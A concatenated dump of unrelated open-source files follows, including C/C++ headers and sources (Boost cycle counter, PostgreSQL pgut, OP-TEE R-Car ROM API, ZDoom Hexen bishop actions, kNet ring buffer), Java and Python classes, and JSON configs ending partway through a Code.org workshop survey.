#include <algorithm>
#include <numeric>
#include <cstddef>
#include <vector>
#include <boost/assert.hpp>
#include <boost/bind.hpp>
#include <boost/cstdint.hpp>
#define BOOST_CONTEXT_CYCLE
typedef boost::uint64_t cycle_type;
#if _MSC_VER
inline
cycle_type cycles()
{
cycle_type c;
__asm {
cpuid
rdtsc
mov dword ptr [c + 0], eax
mov dword ptr [c + 4], edx
}
return c;
}
#elif defined(__GNUC__) || \
defined(__INTEL_COMPILER) || defined(__ICC) || defined(_ECC) || defined(__ICL)
inline
cycle_type cycles()
{
boost::uint32_t lo, hi;
__asm__ __volatile__ (
"xorl %%eax, %%eax\n"
"cpuid\n"
::: "%eax", "%ebx", "%ecx", "%edx"
);
__asm__ __volatile__ ("rdtsc" : "=a" (lo), "=d" (hi) );
__asm__ __volatile__ (
"xorl %%eax, %%eax\n"
"cpuid\n"
::: "%eax", "%ebx", "%ecx", "%edx"
);
return ( cycle_type)hi << 32 | lo;
}
#else
# error "this compiler is not supported"
#endif
struct cycle_overhead
{
cycle_type operator()()
{
cycle_type start( cycles() );
return cycles() - start;
}
};
inline
cycle_type overhead_cycle()
{
std::size_t iterations( 10);
std::vector< cycle_type > overhead( iterations, 0);
for ( std::size_t i( 0); i < iterations; ++i)
std::generate(
overhead.begin(), overhead.end(),
cycle_overhead() );
BOOST_ASSERT( overhead.begin() != overhead.end() );
return std::accumulate( overhead.begin(), overhead.end(), 0) / iterations;
}
#endif // CYCLE_I386_H
| 866 |
360 | <gh_stars>100-1000
/*-------------------------------------------------------------------------
*
* pgut.h
*
* Portions Copyright (c) 2020 Huawei Technologies Co.,Ltd.
* Portions Copyright (c) 2009-2013, NIPPON TELEGRAPH AND TELEPHONE CORPORATION
* Portions Copyright (c) 2017-2019, Postgres Professional
*
*-------------------------------------------------------------------------
*/
#ifndef PGUT_H
#define PGUT_H
#include "postgres_fe.h"
#include "libpq/libpq-fe.h"
typedef void (*pgut_atexit_callback)(bool fatal, void *userdata);
extern void pgut_help(bool details);
/*
* pgut framework variables and functions
*/
extern bool prompt_password;
extern bool interrupted;
extern bool in_cleanup;
extern bool in_password; /* User prompts password */
extern void pgut_atexit_push(pgut_atexit_callback callback, void *userdata);
extern void pgut_atexit_pop(pgut_atexit_callback callback, void *userdata);
extern void pgut_init(void);
extern void on_cleanup(void);
/*
* Database connections
*/
extern PGconn *pgut_connect(const char *host, const char *port,
const char *dbname, const char *username);
extern PGconn *pgut_connect_replication(const char *host, const char *port,
const char *dbname,
const char *username);
extern void pgut_disconnect(PGconn *conn);
extern void pgut_disconnect_callback(bool fatal, void *userdata);
extern PGresult *pgut_execute(PGconn* conn, const char *query, int nParams,
const char **params);
extern PGresult *pgut_execute_extended(PGconn* conn, const char *query, int nParams,
const char **params, bool text_result, bool ok_error);
extern PGresult *pgut_execute_parallel(PGconn* conn, PGcancel* thread_cancel_conn,
const char *query, int nParams,
const char **params, bool text_result, bool ok_error, bool async);
extern bool pgut_send(PGconn* conn, const char *query, int nParams, const char **params, int elevel);
extern void pgut_cancel(PGconn* conn);
extern int pgut_wait(int num, PGconn *connections[], struct timeval *timeout);
/*
* memory allocators
*/
extern void *pgut_malloc(size_t size);
extern void *pgut_realloc(void *p, size_t oldSize, size_t size);
extern char *pgut_strdup(const char *str);
#define pgut_new(type) ((type *) pgut_malloc(sizeof(type)))
#define pgut_newarray(type, n) ((type *) pgut_malloc(sizeof(type) * (n)))
/*
* file operations
*/
extern FILE *pgut_fopen(const char *path, const char *mode, bool missing_ok);
/*
* Assert
*/
#undef Assert
#undef AssertArg
#undef AssertMacro
#ifdef USE_ASSERT_CHECKING
#define Assert(x) assert(x)
#define AssertArg(x) assert(x)
#define AssertMacro(x) assert(x)
#else
#define Assert(x) ((void) 0)
#define AssertArg(x) ((void) 0)
#define AssertMacro(x) ((void) 0)
#endif
#define IsSpace(c) (isspace((unsigned char)(c)))
#define IsAlpha(c) (isalpha((unsigned char)(c)))
#define IsAlnum(c) (isalnum((unsigned char)(c)))
#define ToLower(c) (tolower((unsigned char)(c)))
#define ToUpper(c) (toupper((unsigned char)(c)))
/*
* socket operations
*/
extern int wait_for_socket(int sock, struct timeval *timeout);
extern int wait_for_sockets(int nfds, fd_set *fds, struct timeval *timeout);
#ifdef WIN32
extern int sleep(unsigned int seconds);
extern int usleep(unsigned int usec);
#endif
#endif /* PGUT_H */
| 1,780 |
3,673 | #include "common.hpp"
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>
#include <posix/fd_map.hpp>
static off_t sys_lseek(int fd, off_t offset, int whence)
{
if(auto* fildes = FD_map::_get(fd); fildes)
return fildes->lseek(offset, whence);
return -EBADF;
}
static off_t sys__llseek(unsigned int /*fd*/, unsigned long /*offset_high*/,
unsigned long /*offset_low*/, loff_t* /*result*/,
unsigned int /*whence*/) {
return -ENOSYS;
}
extern "C"
off_t syscall_SYS_lseek(int fd, off_t offset, int whence) {
return strace(sys_lseek, "lseek", fd, offset, whence);
}
extern "C"
off_t syscall_SYS__llseek(unsigned int fd, unsigned long offset_high,
unsigned long offset_low, loff_t *result,
unsigned int whence) {
return strace(sys__llseek, "_llseek", fd, offset_high, offset_low,
result, whence);
}
| 432 |
343 | // Copyright 2013 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#include "syzygy/instrument/instrumenters/branch_instrumenter.h"
#include "base/logging.h"
#include "base/files/file_util.h"
#include "base/strings/string_number_conversions.h"
#include "syzygy/application/application.h"
#include "syzygy/pe/image_filter.h"
namespace instrument {
namespace instrumenters {
const char BranchInstrumenter::kAgentDllBasicBlockEntry[] =
"basic_block_entry_client.dll";
const uint32_t kNumSlots = 4U;
BranchInstrumenter::BranchInstrumenter()
: buffering_(false), fs_slot_(0U) {
agent_dll_ = kAgentDllBasicBlockEntry;
}
bool BranchInstrumenter::InstrumentPrepare() {
return true;
}
bool BranchInstrumenter::InstrumentImpl() {
branch_transform_.reset(
new instrument::transforms::BranchHookTransform());
branch_transform_->set_instrument_dll_name(agent_dll_);
branch_transform_->set_buffering(buffering_);
branch_transform_->set_fs_slot(fs_slot_);
if (!relinker_->AppendTransform(branch_transform_.get()))
return false;
add_bb_addr_stream_mutator_.reset(new
instrument::mutators::AddIndexedDataRangesStreamPdbMutator(
branch_transform_->bb_ranges(),
common::kBasicBlockRangesStreamName));
if (!relinker_->AppendPdbMutator(add_bb_addr_stream_mutator_.get()))
return false;
return true;
}
bool BranchInstrumenter::DoCommandLineParse(
const base::CommandLine* command_line) {
if (!Super::DoCommandLineParse(command_line))
return false;
// Parse the additional command line arguments.
buffering_ = command_line->HasSwitch("buffering");
if (command_line->HasSwitch("fs-slot")) {
std::string fs_slot_str = command_line->GetSwitchValueASCII("fs-slot");
if (!base::StringToUint(fs_slot_str, &fs_slot_)) {
LOG(ERROR) << "Unrecognized FS-slot: not a valid number.";
return false;
}
if (fs_slot_ == 0 || fs_slot_ > kNumSlots) {
LOG(ERROR) << "fs-slot must be from 1 to " << kNumSlots << ".";
return false;
}
}
return true;
}
} // namespace instrumenters
} // namespace instrument
| 902 |
638 | {
// Consultez https://go.microsoft.com/fwlink/?LinkId=733558
// pour voir la documentation sur le format de tasks.json
"version": "2.0.0",
"tasks": [
{
"type": "haxe",
"args": "active configuration",
"group": {
"kind": "build",
"isDefault": true
}
}
]
} | 124 |
852 | #ifndef CondTools_L1Trigger_L1CondDBPayloadWriter_h
#define CondTools_L1Trigger_L1CondDBPayloadWriter_h
// -*- C++ -*-
//
// Package: L1Trigger
// Class : L1CondDBPayloadWriter
//
/**\class L1CondDBPayloadWriter L1CondDBPayloadWriter.h CondTools/L1Trigger/interface/L1CondDBPayloadWriter.h
Description: <one line class summary>
Usage:
<usage>
*/
//
// Original Author:
// Created: Sun Mar 2 07:06:56 CET 2008
// $Id: L1CondDBPayloadWriter.h,v 1.6 2009/12/17 23:43:58 wmtan Exp $
//
// system include files
#include <memory>
// user include files
#include "FWCore/Framework/interface/Frameworkfwd.h"
#include "FWCore/Framework/interface/one/EDAnalyzer.h"
#include "FWCore/Framework/interface/Event.h"
#include "FWCore/Framework/interface/MakerMacros.h"
#include "FWCore/ParameterSet/interface/ParameterSet.h"
#include "CondTools/L1Trigger/interface/DataWriter.h"
// forward declarations
class L1TriggerKey;
class L1TriggerKeyRcd;
class L1CondDBPayloadWriter : public edm::one::EDAnalyzer<> {
public:
explicit L1CondDBPayloadWriter(const edm::ParameterSet&);
~L1CondDBPayloadWriter() override;
private:
void beginJob() override;
void analyze(const edm::Event&, const edm::EventSetup&) override;
void endJob() override;
// ----------member data ---------------------------
l1t::DataWriter m_writer;
// std::string m_tag ; // tag is known by PoolDBOutputService
// set to false to write config data without valid TSC key
bool m_writeL1TriggerKey;
// set to false to write config data only
bool m_writeConfigData;
// substitute new payload tokens for existing keys in L1TriggerKeyList
bool m_overwriteKeys;
bool m_logTransactions;
// if true, do not retrieve L1TriggerKeyList from EventSetup
bool m_newL1TriggerKeyList;
edm::ESGetToken<L1TriggerKey, L1TriggerKeyRcd> l1TriggerKeyToken_;
};
#endif
| 642 |
1,102 | <reponame>johny-c/ViZDoom<filename>src/vizdoom/src/g_hexen/a_bishop.cpp<gh_stars>1000+
/*
#include "actor.h"
#include "info.h"
#include "p_local.h"
#include "s_sound.h"
#include "a_action.h"
#include "m_random.h"
#include "a_hexenglobal.h"
#include "thingdef/thingdef.h"
*/
static FRandom pr_boom ("BishopBoom");
static FRandom pr_atk ("BishopAttack");
static FRandom pr_decide ("BishopDecide");
static FRandom pr_doblur ("BishopDoBlur");
static FRandom pr_sblur ("BishopSpawnBlur");
static FRandom pr_pain ("BishopPainBlur");
//============================================================================
//
// A_BishopAttack
//
//============================================================================
DEFINE_ACTION_FUNCTION(AActor, A_BishopAttack)
{
if (!self->target)
{
return;
}
S_Sound (self, CHAN_BODY, self->AttackSound, 1, ATTN_NORM);
if (self->CheckMeleeRange())
{
int damage = pr_atk.HitDice (4);
int newdam = P_DamageMobj (self->target, self, self, damage, NAME_Melee);
P_TraceBleed (newdam > 0 ? newdam : damage, self->target, self);
return;
}
self->special1 = (pr_atk() & 3) + 5;
}
//============================================================================
//
// A_BishopAttack2
//
// Spawns one of a string of bishop missiles
//============================================================================
DEFINE_ACTION_FUNCTION(AActor, A_BishopAttack2)
{
AActor *mo;
if (!self->target || !self->special1)
{
self->special1 = 0;
self->SetState (self->SeeState);
return;
}
mo = P_SpawnMissile (self, self->target, PClass::FindClass("BishopFX"));
if (mo != NULL)
{
mo->tracer = self->target;
}
self->special1--;
}
//============================================================================
//
// A_BishopMissileWeave
//
//============================================================================
DEFINE_ACTION_FUNCTION(AActor, A_BishopMissileWeave)
{
A_Weave(self, 2, 2, 2*FRACUNIT, FRACUNIT);
}
//============================================================================
//
// A_BishopDecide
//
//============================================================================
DEFINE_ACTION_FUNCTION(AActor, A_BishopDecide)
{
if (pr_decide() < 220)
{
return;
}
else
{
self->SetState (self->FindState ("Blur"));
}
}
//============================================================================
//
// A_BishopDoBlur
//
//============================================================================
DEFINE_ACTION_FUNCTION(AActor, A_BishopDoBlur)
{
self->special1 = (pr_doblur() & 3) + 3; // Random number of blurs
if (pr_doblur() < 120)
{
P_ThrustMobj (self, self->angle + ANG90, 11*FRACUNIT);
}
else if (pr_doblur() > 125)
{
P_ThrustMobj (self, self->angle - ANG90, 11*FRACUNIT);
}
else
{ // Thrust forward
P_ThrustMobj (self, self->angle, 11*FRACUNIT);
}
S_Sound (self, CHAN_BODY, "BishopBlur", 1, ATTN_NORM);
}
//============================================================================
//
// A_BishopSpawnBlur
//
//============================================================================
DEFINE_ACTION_FUNCTION(AActor, A_BishopSpawnBlur)
{
AActor *mo;
if (!--self->special1)
{
self->velx = 0;
self->vely = 0;
if (pr_sblur() > 96)
{
self->SetState (self->SeeState);
}
else
{
self->SetState (self->MissileState);
}
}
mo = Spawn ("BishopBlur", self->Pos(), ALLOW_REPLACE);
if (mo)
{
mo->angle = self->angle;
}
}
//============================================================================
//
// A_BishopChase
//
//============================================================================
DEFINE_ACTION_FUNCTION(AActor, A_BishopChase)
{
fixed_t newz = self->Z() - finesine[self->special2 << BOBTOFINESHIFT] * 4;
self->special2 = (self->special2 + 4) & 63;
newz += finesine[self->special2 << BOBTOFINESHIFT] * 4;
self->SetZ(newz);
}
//============================================================================
//
// A_BishopPuff
//
//============================================================================
DEFINE_ACTION_FUNCTION(AActor, A_BishopPuff)
{
AActor *mo;
mo = Spawn ("BishopPuff", self->PosPlusZ(40*FRACUNIT), ALLOW_REPLACE);
if (mo)
{
mo->velz = FRACUNIT/2;
}
}
//============================================================================
//
// A_BishopPainBlur
//
//============================================================================
DEFINE_ACTION_FUNCTION(AActor, A_BishopPainBlur)
{
AActor *mo;
if (pr_pain() < 64)
{
self->SetState (self->FindState ("Blur"));
return;
}
fixed_t xo = (pr_pain.Random2() << 12);
fixed_t yo = (pr_pain.Random2() << 12);
fixed_t zo = (pr_pain.Random2() << 11);
mo = Spawn ("BishopPainBlur", self->Vec3Offset(xo, yo, zo), ALLOW_REPLACE);
if (mo)
{
mo->angle = self->angle;
}
}
| 1,845 |
310 | /*
!@
MIT License
Copyright (c) 2020 Skylicht Technology CO., LTD
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files
(the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify,
merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
This file is part of the "Skylicht Engine".
https://github.com/skylicht-lab/skylicht-engine
!#
*/
#pragma once
#include "CBase.h"
#include "CScrollBar.h"
namespace Skylicht
{
namespace Editor
{
namespace GUI
{
class CScrollControl : public CBase
{
protected:
CScrollBar* m_vertical;
CScrollBar* m_horizontal;
bool m_canScrollV;
bool m_canScrollH;
float m_widthScrollExpand;
float m_heightScrollExpand;
bool m_modifyChildWidth;
public:
CScrollControl(CBase* parent);
~CScrollControl();
virtual void layout();
virtual void onChildBoundsChanged(const SRect& oldChildBounds, CBase* child);
virtual bool onMouseWheeled(int delta);
virtual void onScrollBarV(CBase* base);
virtual void onScrollBarH(CBase* base);
void scrollToItem(CBase* item);
void showScrollBar(bool h, bool v);
void enableScroll(bool h, bool v);
void enableModifyChildWidth(bool b)
{
m_modifyChildWidth = b;
}
float getInnerWidth();
float getInnerHeight();
float getScrollVertical();
float getScrollHorizontal();
void setScrollVertical(float y);
void setScrollHorizontal(float x);
inline CScrollBar* getVerticalScroll()
{
return m_vertical;
}
inline CScrollBar* getHorizontalScroll()
{
return m_horizontal;
}
void scrollVerticalOffset(float offset);
void scrollHorizontalOffset(float offset);
protected:
void updateScrollBar();
};
}
}
} | 887 |
1,350 | // Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
package com.azure.cosmos.implementation.caches;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import reactor.core.publisher.Mono;
import java.util.Optional;
import java.util.concurrent.Callable;
class AsyncLazy<TValue> {
private final static Logger logger = LoggerFactory.getLogger(AsyncLazy.class);
private final Mono<TValue> single;
private volatile TValue value;
private volatile boolean failed;
public AsyncLazy(Callable<Mono<TValue>> func) {
this(Mono.defer(() -> {
logger.debug("using Function<Mono<TValue>> {}", func);
try {
return func.call();
} catch (Exception e) {
return Mono.error(e);
}
}));
}
public AsyncLazy(TValue value) {
this.single = Mono.just(value);
this.value = value;
this.failed = false;
}
private AsyncLazy(Mono<TValue> single) {
logger.debug("constructor");
this.single = single
.doOnSuccess(v -> this.value = v)
.doOnError(e -> this.failed = true)
.cache();
}
public Mono<TValue> single() {
return single;
}
public boolean isSucceeded() {
return value != null;
}
public Optional<TValue> tryGet() {
TValue result = this.value;
if (result == null) {
return Optional.empty();
} else {
return Optional.of(result);
}
}
public boolean isFaulted() {
return failed;
}
}
| 742 |
10,723 | <filename>demo/src/main/java/me/yokeyword/sample/demo_wechat/event/StartBrotherEvent.java<gh_stars>1000+
package me.yokeyword.sample.demo_wechat.event;
import me.yokeyword.fragmentation.SupportFragment;
/**
* Created by YoKeyword on 16/6/30.
*/
public class StartBrotherEvent {
public SupportFragment targetFragment;
public StartBrotherEvent(SupportFragment targetFragment) {
this.targetFragment = targetFragment;
}
}
| 159 |
1,179 | // SPDX-License-Identifier: BSD-2-Clause
/*
* Copyright (c) 2021, EPAM Systems
*/
#include <assert.h>
#include <kernel/panic.h>
#include <mm/core_memprot.h>
#include <mm/core_mmu.h>
#include "rcar.h"
#include "romapi.h"
static int get_api_table_index(void)
{
/*
* Depending on SoC type and version, there are 4 possible addresses
* for each ROMAPI function
*/
static int index __nex_data = -1;
if (index != -1)
return index;
switch (rcar_prr_value & PRR_PRODUCT_MASK) {
case PRR_PRODUCT_H3:
switch (rcar_prr_value & PRR_CUT_MASK) {
case PRR_CUT_10: /* H3 ES1.0 */
case PRR_CUT_11: /* H3 ES1.1 */
index = 0;
break;
case PRR_CUT_20: /* H3 ES2.0 */
index = 1;
break;
default: /* Newer H3 versions use unified table */
index = 3;
break;
}
break;
case PRR_PRODUCT_M3W:
switch (rcar_prr_value & PRR_CUT_MASK) {
case PRR_CUT_10: /* M3 ES1.0 */
index = 2;
break;
default: /* Newer M3 versions use unified table */
index = 3;
break;
}
break;
default: /* All other SoCs use unified table */
index = 3;
break;
}
return index;
}
/* implemented in romapi_call.S */
extern uint32_t __plat_romapi_wrapper(paddr_t func, uint64_t arg1,
uint64_t arg2, uint64_t arg3);
static uint32_t __plat_romapi_direct(paddr_t func, uint64_t arg1,
uint64_t arg2, uint64_t arg3)
{
uint32_t (*fptr)(uint64_t arg1, uint64_t arg2, uint64_t arg3) = NULL;
assert(!cpu_mmu_enabled());
fptr = (typeof(fptr))func;
return fptr(arg1, arg2, arg3);
}
static uint32_t plat_call_romapi(paddr_t func, uint64_t arg1,
uint64_t arg2, uint64_t arg3)
{
uint32_t (*fptr)(paddr_t func, uint64_t arg1, uint64_t arg2,
uint64_t arg3) = NULL;
/*
* If MMU is enabled, we need to use trampoline function that will
* disable MMU and switch stack pointer to physical address. On other
* hand, if MMU is disabled, we can call the ROM function directly.
*/
if (cpu_mmu_enabled())
/*
* With ASLR enabled __plat_romapi_wrapper() function will be
* mapped at two addresses: at random address (with the rest of
* OP-TEE) and at identity address. We need to map it at
* identity address and call it at identity address because this
* function turns off MMU to perform ROM API call. But
* __plat_romapi_wrapper *symbol* will be relocated by ASLR
* code. To get identity address of the function we need to use
* virt_to_phys().
*/
fptr = (void *)virt_to_phys(__plat_romapi_wrapper);
else
/*
* With MMU disabled we can call ROM code directly.
*/
fptr = __plat_romapi_direct;
return fptr(func, arg1, arg2, arg3);
}
static paddr_t va2pa(void *ptr)
{
if (cpu_mmu_enabled())
return virt_to_phys(ptr);
else
return (paddr_t)ptr;
}
static const paddr_t romapi_getrndvector[] = {
0xEB10DFC4, /* H3 1.0/1.1, needs confirmation */
0xEB117134, /* H3 2.0 */
0xEB11055C, /* M3 1.0/1.05, needs confirmation */
0xEB100188, /* H3 3.0, M3 1.1+, M3N, E3, D3, V3M 2.0 */
};
uint32_t plat_rom_getrndvector(uint8_t rndbuff[PLAT_RND_VECTOR_SZ],
uint8_t *scratch, uint32_t scratch_sz)
{
uint32_t ret = -1;
paddr_t func_addr = romapi_getrndvector[get_api_table_index()];
paddr_t rndbuff_pa = va2pa(rndbuff);
paddr_t scratch_pa = va2pa(scratch);
assert(scratch_sz >= 4096);
assert(rndbuff_pa % RCAR_CACHE_LINE_SZ == 0);
assert(scratch_pa % RCAR_CACHE_LINE_SZ == 0);
ret = plat_call_romapi(func_addr, rndbuff_pa, scratch_pa, scratch_sz);
/*
* ROM code is called with MMU turned off, so any accesses to rndbuff
* are not affected by data cache. This can lead to two problems:
*
* 1. Any prior writes can be cached but may not reach memory. So staled
* values can be flushed to memory later and overwrite new data written
* by ROM code. This includes stack as well.
*
* 2. ROM code will write new data to the buffer, but we may see old,
* cached values.
*
* ROM code wrapper will issue dcache_op_all(DCACHE_OP_CLEAN). This will
* ensure that all writes reached memory. After the call we need to
* invalidate the cache to see new data.
*
* We are not accessing scratch area, so no need to do cache maintenance
* for that buffer.
*/
cache_op_inner(DCACHE_AREA_INVALIDATE, rndbuff, PLAT_RND_VECTOR_SZ);
return ret;
}
| 1,754 |
335 | {
"word": "Unusual",
"definitions": [
"Not habitually or commonly occurring or done.",
"Remarkable or interesting because different from or better than others."
],
"parts-of-speech": "Adjective"
} | 83 |
332 | <filename>pyhdb/protocol/headers.py
# Copyright 2014, 2015 SAP SE.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: //www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import collections
import struct
###
from pyhdb.protocol.constants import type_codes
MessageHeader = collections.namedtuple(
'MessageHeader', 'session_id, packet_count, payload_length, varpartsize, num_segments, packet_options')
RequestSegmentHeader = collections.namedtuple(
'RequestSegmentHeader',
'segment_length, segment_offset, num_parts, segment_number, segment_kind, message_type, commit, command_options')
ReplySegmentHeader = collections.namedtuple(
'ReplySegmentHeader',
'segment_length, segment_offset, num_parts, segment_number, segment_kind, function_code')
PartHeader = collections.namedtuple(
'PartHeader',
'part_kind, part_attributes, argument_count, bigargument_count, payload_size, remaining_buffer_size')
class BaseLobheader(object):
"""Base LobHeader class"""
BLOB_TYPE = 1
CLOB_TYPE = 2
NCLOB_TYPE = 3
LOB_TYPES = {type_codes.BLOB: BLOB_TYPE, type_codes.CLOB: CLOB_TYPE, type_codes.NCLOB: NCLOB_TYPE}
# Bit masks for LOB options (field 2 in header):
LOB_OPTION_ISNULL = 0x01
LOB_OPTION_DATAINCLUDED = 0x02
LOB_OPTION_LASTDATA = 0x04
OPTIONS_STR = {
LOB_OPTION_ISNULL: 'isnull',
LOB_OPTION_DATAINCLUDED: 'data_included',
LOB_OPTION_LASTDATA: 'last_data'
}
class WriteLobHeader(BaseLobheader):
"""Write-LOB header structure used when sending data to Hana.
Total header size is 10 bytes.
Note that the lob data does not come immediately after the lob header but AFTER all rowdata headers
have been written to the part header!!!
00: TYPECODE: I1
01: OPTIONS: I1 Options that further refine the descriptor
02: LENGTH: I4 Length of bytes of data that follows
06: POSITION: I4 Position P of the lob data in the part (startinb at the beginning of the part)
...
P: LOB data
"""
header_struct = struct.Struct('<BBII')
class ReadLobHeader(BaseLobheader):
"""
Read-LOB header structure used when receiving data from Hana.
(incomplete in Command Network Protocol Reference docs):
Total header size is 32 bytes. The first columns denotes the offset:
00: TYPE: I1 Type of data
01: OPTIONS: I1 Options that further refine the descriptor
-> no further data to be read for LOB if options->is_null is true
02: RESERVED: I2 (ignore this)
04: CHARLENGTH: I8 Length of string (for asci and unicode)
12: BYTELENGTH: I8 Number of bytes of LOB
20: LOCATORID: B8 8 bytes serving as locator id for LOB
28: CHUNKLENGTH: I4 Number of bytes of LOB chunk in this result set
32: LOB data if CHUNKLENGTH > 0
"""
header_struct_part1 = struct.Struct('<BB') # read blob type and 'options' field
header_struct_part2 = struct.Struct('<2sQQ8sI') # only read if blob is not null (see options field)
def __init__(self, payload):
"""Parse LOB header from payload"""
raw_header_p1 = payload.read(self.header_struct_part1.size)
self.lob_type, self.options = self.header_struct_part1.unpack(raw_header_p1)
if not self.isnull():
raw_header_p2 = payload.read(self.header_struct_part2.size)
header = self.header_struct_part2.unpack(raw_header_p2)
(reserved, self.char_length, self.byte_length, self.locator_id, self.chunk_length) = header
# Set total_lob_length attribute differently for binary and character lobs:
self.total_lob_length = self.byte_length if self.lob_type == self.BLOB_TYPE else self.char_length
def isnull(self):
return bool(self.options & self.LOB_OPTION_ISNULL)
def __str__(self):
"""Return a string of properly formatted header values"""
O = self.OPTIONS_STR
options = [O[o] for o in sorted(self.OPTIONS_STR.keys()) if o & self.options]
options_str = ', '.join(options)
value = 'type: %d, options %d (%s)' % (self.lob_type, self.options, options_str)
if not self.isnull():
value += ', charlength: %d, bytelength: %d, locator_id: %r, chunklength: %d' % \
(self.char_length, self.byte_length, self.locator_id, self.chunk_length)
return '<ReadLobHeader %s>' % value
| 1,809 |
3,170 | <reponame>elix22/AtomicGameEngine
/* Copyright The kNet Project.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License. */
#pragma once
/** @file RingBuffer.h
@brief The RingBuffer class stores a fast raw byte buffer queue storage. */
#include <vector>
namespace kNet
{
/// Implements a byte-based ring buffer (of sorts) of raw bytes.
class RingBuffer
{
public:
explicit RingBuffer(int capacity)
{
data.resize(capacity);
start = 0;
end = 0;
}
/// Returns the total number of bytes that this RingBuffer can contain.
int Capacity() const { return (int)data.size(); }
/// Returns the number of bytes filled in the ring buffer.
int Size() const { return end - start; }
/// Compacts the ring buffer, i.e. moves all bytes to the beginning of the array.
void Compact()
{
// If already compacted, do nothing.
if (start == 0)
return;
const int numBytes = Size();
for(int i = 0; i < numBytes; ++i)
data[i] = data[start+i];
start = 0;
end = numBytes;
}
/// Enlarges the RingBuffer capacity so that it can fit at least the given number of bytes total.
/// If the capacity of the RingBuffer was greater than this, does nothing.
void Resize(int newSize)
{
assert(newSize > 0);
if ((size_t)newSize <= data.size())
return; // No need to resize.
Compact();
data.resize(newSize);
}
void Clear()
{
start = end = 0;
}
/// Returns a pointer to the first byte of actual data.
char *Begin() { return &data[start]; }
/// Returns a pointer to one past the last byte of actual data.
char *End() { return &data[end]; }
int StartIndex() const { return start; }
/// Call after having inserted the given amount of bytes to the buffer.
void Inserted(int numBytes)
{
end += numBytes;
assert(end <= (int)data.size());
}
/// Call after having processed the given number of bytes from the buffer.
void Consumed(int numBytes)
{
start += numBytes;
assert(start <= end);
if (start == end) // Free compact?
start = end = 0;
}
/// Returns the total number of bytes that can be filled in this structure after compacting.
int TotalFreeBytesLeft() const { return (int)data.size() - Size(); }
/// Returns the number of bytes that can be added to this structure contiguously, without having to compact.
int ContiguousFreeBytesLeft() const { return (int)data.size() - end; }
private:
std::vector<char> data;
int start; ///< Points to the first used byte.
int end; ///< Points to the first unused byte.
};
} // ~kNet
| 1,067 |
772 | {
"published": true,
"title": "Satisfaction Survey for Code.org's CS Fundamentals Intro Professional Development Workshop",
"pages": [
{
"name": "page1",
"elements": [
{
"type": "html",
"name": "intro_text",
"html": "<p><strong>Well done, you've completed the Code.org CS Fundamentals Intro workshop!</strong></p><p>This survey asks questions about your experience today. Your feedback is crucial to ensuring we best serve educators through continual program improvement.</p><p><strong>Privacy and Confidentiality</strong></p><ul><li>Your individual responses here are completely <strong>confidential</strong>.</li><li>Your identity will <strong>never</strong> be revealed publicly or used to tie any responses back to you personally.</li><li>We may share <strong>de-identified</strong>, aggregate data (representing all responses) publicly.</li><li>Your <strong>de-identified</strong> responses will be used by Code.org, our Regional Partners, and our facilitators for program improvement.</li></ul>"
},
{
"type": "radiogroup",
"name": "workshop_type",
"title": "Was your workshop:",
"choices": [
{
"value": "item1",
"text": "in person"
},
{
"value": "item2",
"text": "virtual"
}
]
},
{
"type": "library_item",
"library_name": "surveys/pd/workshop_elements",
"library_version": 0,
"name": "overall_success"
},
{
"type": "library_item",
"library_name": "surveys/pd/workshop_elements",
"library_version": 0,
"name": "what_supported"
},
{
"type": "library_item",
"library_name": "surveys/pd/workshop_elements",
"library_version": 0,
"name": "what_detracted"
},
{
"type": "library_item",
"library_name": "surveys/pd/workshop_elements",
"library_version": 0,
"name": "curriculum_impressions_csf"
},
{
"type": "comment",
"name": "feedback_venue_logistics",
"title": "Do you have feedback about the venue and the way logistics were run for this workshop? Please be specific and provide suggestions for improvement."
},
{
"type": "comment",
"name": "anything_else",
"title": "Is there anything else you’d like to tell us about your experience at this workshop?"
},
{
"type": "library_item",
"library_name": "surveys/pd/facilitator_panel",
"library_version": 0,
"name": "facilitators"
},
{
"type": "html",
"name": "last_text",
"html": "Lastly, we would like to know a little about you, your background, and if we can stay in touch with you."
},
{
"type": "text",
"name": "year_of_birth",
"title": "What is your year of birth?",
"inputType": "number",
"min": "1920",
"max": "2020"
},
{
"type": "library_item",
"library_name": "surveys/pd/demographic_items",
"library_version": 0,
"name": "gender_identity"
},
{
"type": "library_item",
"library_name": "surveys/pd/demographic_items",
"library_version": 0,
"name": "racial_ethnic_identity"
},
{
